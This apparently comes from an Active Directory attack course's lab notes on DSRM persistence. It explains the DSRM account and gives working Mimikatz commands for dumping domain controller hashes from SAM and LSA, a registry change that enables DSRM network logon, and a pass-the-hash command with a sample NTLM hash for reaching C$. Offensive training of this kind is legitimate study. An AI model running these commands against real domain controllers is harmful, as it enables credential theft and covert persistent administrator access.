8.5 - DSRM

DSRM (Directory Services Restore Mode)

DSRM is a special local administrator account that exists on every Domain Controller, primarily used for recovery.

Key Concepts

The Administrator account in DSRM mode is local to the DC.
Its password is defined during promotion to Domain Controller and rarely changed.
If the NTLM hash of this account is obtained, it can be used to authenticate against the DC.
By default, this account cannot log on when the DC is online—a registry modification is needed.

Dump the DSRM Password Hash

Requires Domain Admin privileges:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc

Then compare with:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc

The Administrator hash from lsadump::sam is the DSRM local admin.
The other is the domain Administrator.

Enable DSRM Logon

To allow the DSRM account to log on even when the DC is online, you must set the following registry key on the DC:

Enter-PSSession -ComputerName dcorp-dc
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Value 2 means the DSRM admin can log in regardless of Safe Mode.

Pass-the-Hash (DSRM Access)

Use Mimikatz to authenticate as the local DSRM administrator via pass-the-hash:

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

Then verify access:

ls \\dcorp-dc\C$

A useful persistence mechanism when no domain accounts can be created or controlled.

Labs

Learning Object 11 lab

Previous8.4 - Skeleton Key Next8.6 - Custom SSP

Last updated 8 months ago

hashtagDSRM (Directory Services Restore Mode)

hashtagKey Concepts

hashtagDump the DSRM Password Hash

hashtagEnable DSRM Logon

hashtagPass-the-Hash (DSRM Access)

hashtagLabs